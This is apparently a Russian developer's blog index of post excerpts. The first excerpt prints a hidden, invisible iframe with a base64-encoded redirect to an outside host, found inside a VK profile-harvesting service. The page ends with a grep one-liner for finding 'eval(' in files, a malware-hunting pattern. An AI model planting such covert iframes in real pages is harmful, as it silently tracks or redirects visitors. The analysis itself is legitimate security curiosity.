Alex
This author hasn't added his/her bio.
Sanasol
Доброго времени суток. Недавно исследовал интересный сервис по сбору VK профилей: http://socfishing.ru/ Вход в сервис стоит 5000 рублей единоразово и 5 рублей за каждый собранный профиль человека. Цель была узнать как и что работает при определении профиля человека, но речь пойдет не об этом. При тщательном ковырянии в работе скриптов нашел интересный кусок, который к определению имеет отношение примерно никакое 🙂 А нашелся собственно вот такой вот код
1 |
document.write('<iframe sandbox=\'allow-same-origin allow-scripts\' seamless id=\'sfrload\' src=\'data:text/html;charset=utf-8;base64,PCEtLSAtLT48c2NyaXB0IGFzeW5jPiB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJodHRwczovL3lvdTQzLnJ1L3lhbmRpbnRzaXRlLz91PWZiYjg5ZTM2YzM1OTJmMjIyMTZjZTMzM2Q4ZDFhMjUwIjsgPC9zY3JpcHQ+PCEtLSAtLT4=\' style=\'width:1px;height:1px;opacity:0;\'><\/iframe>'); |
Для тех кто не шарит:.. Read More
Жил был один новостной сайт на вордпрессе. Стал плохо жить и переехал к нам на хостинг на собственный выделенный сервер. Но вот незадача он кушал ресурсы сервера так как-будто это был дешевый шаред хостинг, и сервер не выдерживал нагрузки в пиковые моменты. А на сайт тот заходили по 10-20 тысяч человек в день и это было очень печально, ведь там стояли еще несколько почти таких же сайтов. Стали мы искать кто же так.. Read More
Делать было нечего, дело было почти утром. После поста ZenPR решил сделать проверялку текстов на воду. По быстрому на коленке получилось как-то так: http://stopwords.sanasol.ws/
При использовании php-activerecord наткнулся на «косяк». Если поле в базе имеет тип время/дата, в моем случае timestamp, то php-ar отдает отформатированную по дефолту строку, вместо собственно самого timestampа. При курении доков выяснилось что используется там обычный DateTime из php В общем чтобы получить unix время из поля приходится делать как-то так
1 2 |
$cpayment = Cpayment::find('first'); echo $cpayment->time->getTimestamp(); |
Памятка для себя, потому что второй раз затупил c этим косяком 🙂
Сказ о том как я провел свой хакатон или два «сломанных» хостинга за одну ночь: часть первая Locum. Прошло уже более полугода, а я только сейчас решил об этом написать. Дело было вечером, делать было нечего. Так наверно можно начать большинство рассказов про исследование уязвимостей различных сервисов и софта.
Зачем нужен можно глянуть здесь: http://sarkazm.name/odnoklassniki/obhod-prokladki-v-odnoklassnikah/ Забрать можно здесь: https://github.com/S-anasol/sanasol/tree/master/web/wotparse Собственно запускать через консоль: php index.php В domains.txt будут записаны домены с рейтингом 1 и 2(зеленые кружки и чуть менее зеленые кружки) Остается дело за малым, проверить наличие обратных ссылок с этих сайтов. Я не придумал простого автоматического способа без обхода капч поисковиков, так что думайте сами. Прикладываю результат для 200-999 страниц 14к «трастовых» доменов: https://gist.github.com/S-anasol/888b370bf6234cce0134
1 |
find . -type f -exec grep -l "eval(" {} \; |